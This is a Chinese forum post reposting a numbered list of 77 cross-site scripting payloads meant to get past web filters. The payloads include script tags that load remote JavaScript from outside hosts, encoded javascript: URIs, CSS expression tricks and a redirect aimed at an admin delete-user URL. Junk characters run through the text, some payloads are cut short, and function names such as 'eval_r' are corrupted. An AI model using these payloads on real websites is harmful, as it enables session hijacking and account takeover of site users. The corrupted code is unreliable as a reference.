貌似关于xss的资料t00ls比较少,看见好东西Copy过来,不知道有木有童鞋需要Mark的。
. B4 K( q( r5 e v m0 Z(1)普通的XSS JavaScript注入2 f1 V2 h' D4 C; e' k+ `6 e7 c, V
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>8 b- g J! B9 T! _+ V9 V+ Y
(2)IMG标签XSS使用JavaScript命令
% ]; {: V& [5 |; l9 R9 L$ Y* M5 P/ F9 j<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
, `; ~. w; G$ @2 R(3)IMG标签无分号无引号. y2 H4 @4 p, L3 ~ i( R: F
<IMG SRC=javascript:alert(‘XSS’)>
' K3 \) P- ^# t1 v( P# o' j/ i(4)IMG标签大小写不敏感
; e0 ^7 U$ R6 v& a<IMG SRC=JaVaScRiPt:alert(‘XSS’)>
7 j2 @: z* j5 f" |4 T1 f: {(5)HTML编码(必须有分号)# \$ S$ d" x5 m% Q' b6 P; k' h
<IMG SRC=javascript:alert(“XSS”)>! C7 z9 t h' H! m& g7 k1 c, l
(6)修正缺陷IMG标签' |) j7 A) }! _- y
<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>
8 G2 ~8 F8 i" d' A2 ?; s# U$ X9 t% G8 c9 m9 v* v' F
. d+ b4 [2 N% q; F
(7)formCharCode标签(计算器)
$ }3 P" ~. q9 R<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>5 Z7 x8 O& W2 L
(8)UTF-8的Unicode编码(计算器)
0 `" n1 I" F" i' w/ r+ h<IMG SRC=jav..省略..S')>
; O2 h" [+ ^! p4 z9 u. W0 y(9)7位的UTF-8的Unicode编码是没有分号的(计算器)8 q$ V' y1 q8 j, D2 Z6 d
<IMG SRC=jav..省略..S')>
8 M. j7 x G3 I5 t- A(10)十六进制编码也是没有分号(计算器)% M# w8 U& ]* Z" B6 Q
<IMG SRC=java..省略..XSS')>
7 k* Y* H$ q# q8 X(11)嵌入式标签,将Javascript分开! i( U |0 D0 }( Z8 n
<IMG SRC=”jav ascript:alert(‘XSS’);”>* D1 x4 {. G, Z
(12)嵌入式编码标签,将Javascript分开
$ ?# w+ {# L1 p* n* ^* E<IMG SRC=”jav ascript:alert(‘XSS’);”>+ a+ c, H* D3 e
(13)嵌入式换行符
/ z! q$ }, s o% {) s<IMG SRC=”jav ascript:alert(‘XSS’);”>
# A$ c4 L2 _& E7 ~$ f# R(14)嵌入式回车
, A& _& n; H- T7 F2 a* X: D3 z<IMG SRC=”jav ascript:alert(‘XSS’);”>
6 g4 I/ |8 t/ i: k' v$ R(15)嵌入式多行注入JavaScript,这是XSS极端的例子
4 n% h$ r' p- j4 U% Z5 r3 N<IMG SRC=”javascript:alert(‘XSS‘)”>9 X$ i& i+ r/ }' j* b# D; K+ W
(16)解决限制字符(要求同页面)# R$ C& [$ v6 t/ c* ?5 e- D* F4 x
<script>z=’document.’</script>8 V0 ^' m; h2 H X% H j" E
<script>z=z+’write(“‘</script>( H8 B! i3 F) H. q
<script>z=z+’<script’</script>2 P9 C; f9 }" e0 \5 ~
<script>z=z+’ src=ht’</script>
2 r6 {8 D" E c8 l1 c<script>z=z+’tp://ww’</script>
" `0 P# o2 O; ?6 Z5 f4 Q0 O<script>z=z+’w.shell’</script>
3 B, K; S- W6 v2 Z0 a; r' B<script>z=z+’.net/1.’</script>
# s1 w3 U t5 b4 e<script>z=z+’js></sc’</script>
! P! B* ~4 ]7 s) `9 s! t6 K<script>z=z+’ript>”)’</script>+ X2 I6 }7 A8 y8 V
<script>eval_r(z)</script>
& Q8 S e0 u( \(17)空字符12-7-1 T00LS - Powered by Discuz! Board7 I4 `5 J1 S* `9 @4 ]/ E& u; v
https://www.t00ls.net/viewthread ... table&tid=15267 2/6
6 _6 Q0 b1 O! Xperl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out/ j/ e( q2 Z- g& L/ ^4 _4 K
(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用
+ v6 F, i- v3 o' J; B: \0 |$ a0 Cperl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out
5 t# Y; q% O/ Z+ X( T(19)Spaces和meta前的IMG标签" I" L* o4 J! e/ D5 e( W K& Z# f
<IMG SRC=” javascript:alert(‘XSS’);”>
. k2 |7 p* Y* I(20)Non-alpha-non-digit XSS1 _' Y% T: c4 ` W: H8 ?
<SCRIPT/XSS SRC=”http://3w.org/XSS/xss.js”></SCRIPT>) S P2 i& {: E% F0 m4 X. C
(21)Non-alpha-non-digit XSS to 25 t4 F. ^4 x; i3 x3 f5 g
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>
1 w$ P0 N1 }$ E* E(22)Non-alpha-non-digit XSS to 36 z; m& G1 m( A2 g2 \* ]' d
<SCRIPT/SRC=”http://3w.org/XSS/xss.js”></SCRIPT>
! w! M( `" h' C6 Z \5 e1 p( e$ c(23)双开括号
3 \/ [5 z2 {1 j- ^<<SCRIPT>alert(“XSS”);//<</SCRIPT>4 |: `0 Q1 S2 Y3 d: y8 y2 r4 r8 \
(24)无结束脚本标记(仅火狐等浏览器); c6 ?$ Y2 N: @
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>
6 t( B: s7 _: m9 R/ y+ X5 u9 T- `(25)无结束脚本标记2
+ Z) M% V+ ?% o. O. [<SCRIPT SRC=//3w.org/XSS/xss.js>
% Y U4 t& X% q(26)半开的HTML/JavaScript XSS
2 m# s. _( U3 L: Y/ o<IMG SRC=”javascript:alert(‘XSS’)”
! C6 D/ Q) W; a; r7 V! N9 h1 F(27)双开角括号
3 x1 |4 W5 t0 Y. \% @5 f8 {<iframe src=http://3w.org/XSS.html <
/ \9 |0 D0 c _" Z- F( {(28)无单引号 双引号 分号; j2 l; t( B- H9 o8 k+ y5 I" I) H
<SCRIPT>a=/XSS/* `+ [) q, k* g$ J0 E: O. c- h
alert(a.source)</SCRIPT>% G- H& ~* I4 N. k" A4 _- `
(29)换码过滤的JavaScript" \; d/ f; b# }& _; u- b
\”;alert(‘XSS’);//
& e! @% ^. C( G(30)结束Title标签
! G& l# `4 k7 j/ k$ U3 ?</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>
0 {' }; I; X- I# ^! U) q! `(31)Input Image5 ]+ ^, |1 |& ?+ {6 M
<INPUT SRC=”javascript:alert(‘XSS’);”>9 {: R: l9 x, m6 i5 u
(32)BODY Image6 A% F# m" O6 g; V
<BODY BACKGROUND=”javascript:alert(‘XSS’)”>
; y& V j3 i- R: H7 {- a% d(33)BODY标签. L$ @/ d* k8 I; x6 Y" k* ]' U6 y
<BODY(‘XSS’)>( }2 |3 Y* Y& H6 ^" L, @
(34)IMG Dynsrc$ O/ e6 y" g" C# V! ]
<IMG DYNSRC=”javascript:alert(‘XSS’)”>% q k2 Q3 I% i: w3 |0 z" S
(35)IMG Lowsrc
) G+ v9 J D. T<IMG LOWSRC=”javascript:alert(‘XSS’)”>
, s: h. H) N( u) X/ c$ o# L! R6 q+ n(36)BGSOUND" B. S/ u# E. W E5 W; d
<BGSOUND SRC=”javascript:alert(‘XSS’);”>% n& h7 x, R @9 k* `
(37)STYLE sheet5 y; |. D% H! q, e2 N! d- @
<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>
2 D7 i; S) M5 l4 S; P# G' L* x(38)远程样式表9 @3 u% `5 R$ m% q2 r
<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>
9 S& q) U9 w+ [7 }4 N7 U(39)List-style-image(列表式)
i6 Z: H3 {6 V8 a<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS) _- D- |/ K. \
(40)IMG VBscript) c" F4 a+ V: R* J& ]+ z
<IMG SRC=’vbscript:msgbox(“XSS”)’></STYLE><UL><LI>XSS
& v$ `/ n. A% f/ n% e0 L(41)META链接url# K6 x' |! e( t+ @- m j4 N7 B
' a n) A: F' {3 T/ y/ q
. L3 R8 L) u. q
<META HTTP-EQUIV=”refresh” CONTENT=”0;$ h3 B, ]2 j7 m
URL=http://;URL=javascript:alert(‘XSS’);”>
8 N0 _6 u" I' M! n8 e(42)Iframe
4 {3 V1 E+ e1 q6 u( r! y, H4 F- B<IFRAME SRC=”javascript:alert(‘XSS’);”></IFRAME>5 x6 g3 \( m# Q4 E6 J, D
(43)Frame4 |# c8 S+ T4 K# h- T2 C7 q5 ]
<FRAMESET><FRAME SRC=”javascript:alert(‘XSS’);”></FRAMESET>12-7-1 T00LS - Powered by Discuz! Board. d( x$ W( R/ Y3 o3 k% R- a5 S b
https://www.t00ls.net/viewthread ... table&tid=15267 3/6
" Q1 {$ [8 p1 n(44)Table) M3 d" r. U5 i. w% ^) h. w6 C/ H
<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>$ Q' S+ C7 H! G: n2 l, { L6 @2 y
(45)TD# }" l' d8 d- j
<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>) U" }# Z8 x: l: f6 k. @. P
(46)DIV background-image, c: W6 P S7 d" }. g! _6 P
<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>/ Y! d! v$ P' c3 M/ Z4 g/ D e
(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-
. J5 X# z8 ]7 L8&13&12288&65279)
4 F3 f f9 _. K6 Q<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>) s; K. E5 ~6 j$ w/ \
(48)DIV expression
# n! k) \6 c! R. a<DIV STYLE=”width: expression_r(alert(‘XSS’));”>
% e! c9 M& n( [0 S# U+ w- C1 q9 [(49)STYLE属性分拆表达- M& \( o) B1 f3 L; _2 H: r3 ^
<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>
6 C$ }8 N% M& v(50)匿名STYLE(组成:开角号和一个字母开头)4 U) ?8 l2 @& p0 { s5 Y
<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>
" b4 O3 n4 L3 r- K, ~, e; m `(51)STYLE background-image
' y$ c M4 i1 p. u& [ Y: B& {<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A3 T+ }. I8 ?" C7 o2 k
CLASS=XSS></A>$ i& O# q0 Q; Q |5 ]' i
(52)IMG STYLE方式8 D. `) p3 v! H6 v! a% f
exppression(alert(“XSS”))’>6 ~: \: l7 q2 o+ S
(53)STYLE background" r6 u$ q; | q4 v$ D; c
<STYLE><STYLE% H0 y9 _) }% ? h, ?2 x3 i& s
type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>
- }4 B$ h" z) E- R% m(54)BASE
1 n7 t3 H7 r* ]6 |: `<BASE HREF=”javascript:alert(‘XSS’);//”>$ i3 A* F/ r# w1 u5 @
(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS
. k) [6 f+ v, F7 T<EMBED SRC=”http://3w.org/XSS/xss.swf” ></EMBED>) r, d. H: Q- _9 D6 s
(56)在flash中使用ActionScrpt可以混进你XSS的代码
( ~, [& b0 u# v& {0 t. s5 H/ Za=”get”;0 i# z4 G2 ?: x; S! o
b=”URL(\”";
% ^* N( R2 Y L; d6 Fc=”javascript:”;
# [& _( k" a$ _d=”alert(‘XSS’);\”)”;
+ Y+ z( W& Z, h5 E: |! E) deval_r(a+b+c+d);! r% F3 B3 }! j# e( `2 R
(57)XML namespace.HTC文件必须和你的XSS载体在一台服务器上
' g! M. m4 W! S& _<HTML xmlns:xss>6 ?5 U( d) R/ h
<?import namespace=”xss” implementation=”http://3w.org/XSS/xss.htc”># {& `, R5 g) \- }; L* ^( e v
<xss:xss>XSS</xss:xss>
% t1 i0 A- k$ k+ ?5 ~ P</HTML>
2 P$ ~3 B+ {0 e+ ?7 b) e(58)如果过滤了你的JS你可以在图片里添加JS代码来利用
( Z; M9 I- ]" L/ q<SCRIPT SRC=””></SCRIPT>; c. ~9 X$ I6 o7 D1 S9 M( W
(59)IMG嵌入式命令,可执行任意命令
* D! w, b- [( ~, t<IMG SRC=”http://www.XXX.com/a.php?a=b”>
3 D3 @: O' x% ^$ H2 k/ X u(60)IMG嵌入式命令(a.jpg在同服务器)9 @: H7 C* r" p; Y, } e
Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser
1 G- W' W+ r; ]) X9 U8 p(61)绕符号过滤
i1 c, i0 ?% a& G- f& M" D<SCRIPT a=”>” SRC=”http://3w.org/xss.js”></SCRIPT>- p" p0 K: S8 }& A8 q
(62)
# T# i8 W6 L( D ^<SCRIPT =”>” SRC=”http://3w.org/xss.js”></SCRIPT>) ^# w( [: F* _6 H: R2 @8 N: M% n Z- G
(63)( l- m F( ^( o2 N
<SCRIPT a=”>” ” SRC=”http://3w.org/xss.js”></SCRIPT>
0 A( l/ p% L1 R+ k$ a(64)
0 \& F, U6 ~9 @0 h- N t6 s<SCRIPT “a=’>’” SRC=”http://3w.org/xss.js”></SCRIPT>
M- ]" ]5 ^" Q3 n" {" m& P% `, u(65)
9 U. t: T# B- g4 ~' a<SCRIPT a=`>` SRC=”http://3w.org/xss.js”></SCRIPT>9 X K% C: I! O
(66)12-7-1 T00LS - Powered by Discuz! Board
4 v9 t( k& [# e" N/ W% \https://www.t00ls.net/viewthread ... table&tid=15267 4/6
& ]4 ]' h G: C, V* Y- k<SCRIPT a=”>’>” SRC=”http://3w.org/xss.js”></SCRIPT>' i5 G1 N7 E m% A3 j, I
(67)0 a* x3 [. k7 k8 I; X
<SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”http://3w.org/xss.js”>
2 Q' i; J" s) Z( y# D</SCRIPT>3 _) u" M: M8 M' \* S
(68)URL绕行
8 }# R& X/ P) V0 D$ D<A HREF=”http://127.0.0.1/”>XSS</A>$ o, ^9 Y, l& Z, |
(69)URL编码0 h) E" U$ w4 n6 U
<A HREF=”http://3w.org”>XSS</A>
6 i9 r! O5 O8 `# x4 P* X(70)IP十进制
& ?+ c) X- D q5 P* }# N" t \, d<A HREF=”http://3232235521″>XSS</A>* V o9 h. y) j: G. j
(71)IP十六进制9 R$ _+ U7 z8 a% y: B' I4 u# O
<A HREF=”http://0xc0.0xa8.0×00.0×01″>XSS</A>0 R9 }8 s. T1 y- V$ D8 s
(72)IP八进制
4 J8 U9 f6 c$ ], g1 e0 l& N) `<A HREF=”http://0300.0250.0000.0001″>XSS</A>
- J- { p: W9 V& ^+ C5 {4 }(73)混合编码
# i* u8 r- |0 Y8 ~ Z<A HREF=”h
& M' n3 i- a8 \3 B0 Htt p://6 6.000146.0×7.147/”">XSS</A>% A, F4 {7 J u) [2 g D; `5 R8 Y
(74)节省[http:]
. T/ D+ g. s' B! R& N2 y. V8 {<A HREF=”//www.google.com/”>XSS</A>
4 @) W' A( b5 w(75)节省[www]
6 y# ?& e4 p$ i<A HREF=”http://google.com/”>XSS</A>
m4 k5 Y0 s' s) y; g(76)绝对点绝对DNS
4 V. s/ l! X' H8 B+ @<A HREF=”http://www.google.com./”>XSS</A>4 I% W/ M4 r" h" w0 i' k
(77)javascript链接
: g o7 E( e* h<A HREF=”javascript:document.location=’http://www.google.com/’”>XSS</A>
5 E, B9 R. F7 \8 L3 I5 l/ [ p; B+ ~" ^: o6 x! T/ a7 r
原文地址:http://fuzzexp.org/u/0day/?p=14
( D, [" s0 K* L/ z: [3 i9 c3 ?! B/ ~; K8 E5 R3 r4 f
|